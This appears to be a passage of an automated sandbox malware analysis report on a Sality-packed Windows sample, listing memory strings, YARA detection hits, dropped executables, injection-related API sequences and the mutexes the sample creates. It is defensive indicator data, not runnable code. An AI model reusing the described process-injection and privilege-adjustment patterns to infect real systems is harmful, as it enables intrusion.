        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
        Source: svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
        Source: msedge.exe.6.drString found in binary or memory: https://crashpad.chromium.org/
        Source: msedge.exe.6.drString found in binary or memory: https://crashpad.chromium.org/bug/new
        Source: msedge.exe.6.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B9627F8000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000024.00000000.1676939865.000001B962800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://da.xboxservices.com/DigitalAttachmentFD/AttachmentRecords
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: StartMenuExperienceHost.exe, 0000001D.00000000.1504669127.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comp
        Source: SearchApp.exe, 0000001F.00000000.1571507511.000001D61CE00000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
        Source: SearchApp.exe, 0000001F.00000000.1554248946.000001D61A4A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfillsThis
        Source: SearchApp.exe, 0000001F.00000000.1556526084.000001D61A800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api/v1/configuration/cortana
        Source: SearchApp.exe, 0000001F.00000000.1554332947.000001D61A4C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/apihttps://msit.loki.delve.office.com/apihttps://gcc.loki.delve.of
        Source: msedge.exe.6.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
        Source: msedge.exe.6.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
        Source: svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
        Source: SearchApp.exe, 0000001F.00000000.1574349980.000001D61D038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/
        Source: SearchApp.exe, 0000001F.00000000.1595795539.000001D62DDC4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/https://substrate.office.comWsbVerifyAccountRequired
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004336B0 GetKeyState,GetKeyState,GetKeyState,GetKeyState,6_2_004336B0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_00431920 IsWindowEnabled,TranslateAccelerator,IsChild,GetFocus,PostMessageA,PostMessageA,SendMessageA,IsChild,IsWindow,IsWindowVisible,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA,WinHelpA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,IsWindow,6_2_00431920

        System Summary

        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a2300.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8c79b4.1.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a25f4.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.872d5c.0.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.2420000.7.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: C:\lwkdr.exe, type: DROPPED Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\winxmkqo.exe, type: DROPPED Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: MyProg.exe.9.dr Static PE information: section name: Y|uR
        Source: lwkdr.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: YMZwp.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winxmkqo.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Process Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004BE74F NtdllDefWindowProc_A,CallWindowProcA
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004C0306 NtdllDefWindowProc_A
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004343B0 GetClassInfoA,NtdllDefWindowProc_A
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0042E630 GetClassInfoA,LoadCursorA,GetStockObject,NtdllDefWindowProc_A
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004BEAF7 GetWindowRect,wsprintfA,wsprintfA,GetClassInfoA,NtdllDefWindowProc_A
        Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
        Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\YMZwp.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: String function: 004ADD18 appears 57 times
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 1624
        Source: MyProg.exe.9.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
        Source: msedge.exe.6.dr Static PE information: Number of sections : 14 > 10
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a2300.9.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8c79b4.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.24a25f4.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.3.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.872d5c.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.8dcfe8.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.2420000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: C:\lwkdr.exe, type: DROPPED Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: C:\Users\user\AppData\Local\Temp\winxmkqo.exe, type: DROPPED Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: YMZwp.exe.6.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: lwkdr.exe.6.dr Static PE information: Section .text
        Source: winxmkqo.exe.6.dr Static PE information: Section .text
        Source: YMZwp.exe.6.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
        Source: msedge.exe.6.dr Binary string: @g_interceptionsntdll.dllg_originals\Device\\/?/?\\??\ntdll.dllRtlInitUnicodeStringntdll.dll\KnownDllsDeriveRestrictedAppContainerSidFromAppContainerSidAndRestrictedNameuserenvchromeInstallFileslpacChromeInstallFilesmediaFoundationCdmFileslpacMediaFoundationCdmDatalpacEdgeWdagCommslpacChromeNetworkSandboxKeyg_handles_to_close
        Source: msedge.exe.6.dr Binary string: \\.\\Device\DeviceApi\Device\DeviceApi\CMApintdll.dllHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_PERFORMANCE_TEXTHKEY_PERFORMANCE_NLSTEXTHKEY_CURRENT_CONFIGHKEY_DYN_DATA\Device\\Device\HarddiskVolume
        Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@8/133@107/5
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0242CC92 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,FindCloseChangeNotification,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification,CloseHandle,GetProcessHeap,HeapFree
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Code function: 9_2_00B3119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0242D2B0 CreateToolhelp32Snapshot,Process32First,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,Process32Next,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,FindCloseChangeNotification,CloseHandle
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004BD591 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\k1[1].rar
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1836_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_4220_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1800_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_8084_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6728_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1160_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6424_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1636_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_936_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1348_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1336_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\spoolsv.exeM_2200_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_792_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_4908_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5064_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2056_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6980_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2884_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\startmenuexperiencehost.exeM_4812_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5956_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2860_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3768_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_6676_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\sihost.exeM_3400_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1392_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_5276_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2700_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6176_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2708_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6248_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1504_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\applicationframehost.exeM_6352_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6224_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1444_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2104_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2044_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2068_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1148_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_6920_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1848_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_352_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_7480_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3520_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_3784_
